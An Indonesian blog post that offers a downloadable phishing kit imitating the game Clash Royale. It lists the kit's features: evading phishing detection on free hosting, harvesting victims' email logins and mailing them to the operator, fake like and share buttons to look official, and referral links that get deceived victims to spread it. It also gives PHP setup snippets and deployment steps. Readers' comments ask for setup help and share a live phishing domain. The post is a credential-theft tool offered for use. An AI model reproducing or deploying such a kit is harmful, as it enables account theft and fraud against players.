Mar 11, 2016

[Download] Script Phising Clash Royale V.1


Haii gaess, lama tidak posting nih ane, hari ini saya tadi membuat script phising Clash Royale nih. Kalau kalian mau ya simak aja dibawah, sebelum itu apa kalian tau Clash Royale itu apa ? Clash Royale itu adalah game baru yang dikeluarkan oleh Supercell pada bulan Februari kemarin secara Official diGoogle Play Store, Game ini mirip dengan Clash Of Clans yaitu terdapat pada Karakter Pasukan dan Buildingsnya hanya berbeda cara Mainnya dan Arenanya saja, coba kalian cek diGoogle Play Store kalian pasti sudah ada Clash Royalenya.

Karena ini masih belum banyak yang share dan saya cari digoogle belum ada yang share (setahu saya) Dengan ini saya akan share script phising hasil buatan saya nih yaitu [Download] Script Phising Clash Royale V.1. Langsung simak gan!!



Berikut ini adalah tampilan resultnya / tampilan setelah ada yang mengisi form web phising kalian dan otomatis akan terkirim ke email kalian.



Fitur

  • Menghilangkan detected phising dari idhostinger / hosting gratis
  • Form input pada email harus diisi dengan email
    Contoh: youremail@gmail.com
  • Terdapat sebuah Link Refferal, digunakan untuk yang telah terjebak didalamnya dan dia akan terkecoh / tertipu dan ingin menyebarkan Link web kalian
  • Link Refferal idnya random, yaitu perorang beda id dan tidak ada yang sama
  • Resultnya langsung dikirim ke Email kalian
  • Penambahan tombol suka dan bagikan langsung dari fanspage tersebut, biar kesannya seperti website Official
  • Tampilan usernya langsung dari tampilan Email korban
  • Responsif / Ringan

Penggunaan

1. Upload file tersebut ke hosting atau cpanel kalian
2. Edit file bagian:
   - Email.php
<?php

$emailku = 'youremail@gmail.com';

?>
   - Home.php
<?

$random = (rand()%100000);

print("<br>link Refferal anda adalah : <br><br><span class='label label-primary'>http://websitemu.com/index.php?reff=$random</span></div>");

?>
- Ganti Youremail@gmail.com menjadi email kalian
- Ganti http://websitemu.com/ menjadi domain website kalian
Contoh : Facebook.com


- Cara mendownloadnya tunggu 5 detik dipojok kanan atas hingga muncul tulisan Skip Ad klik Skip Ad
- Kalau tidak mau kehilangan alamat blog saya bisa dibookmarks dengan cara CTRL + D lalu Done

17 disqus-blogger-komentar

upload nya yang mana aja yg harus di masukkin ke hosting ?

Semuanya yg ada difile dimasukkin ke hosting

gimana cara downloadnya

bro yg home yg mana yg di ganti ????

bro yg file home apa nya yg di ganti ???

Gan ane ga pnya website :v , Di ganti sma apa dong ?

Gan punya ane kok kalo dibuka cuma tulisan
Index of /
Itu apanya ya gan yang salah ?
Dicek coba gan boomboom-clashroyale.netau.net

mantap gan di tunggu kunjungan baliknya : http://phising-game.blogspot.co.id/

gan knapa kok pas saya masuki form target nya dan pas saya cek email saya tdk pesan.
sudh saya edit email.php nya ke email saya


EmoticonEmoticon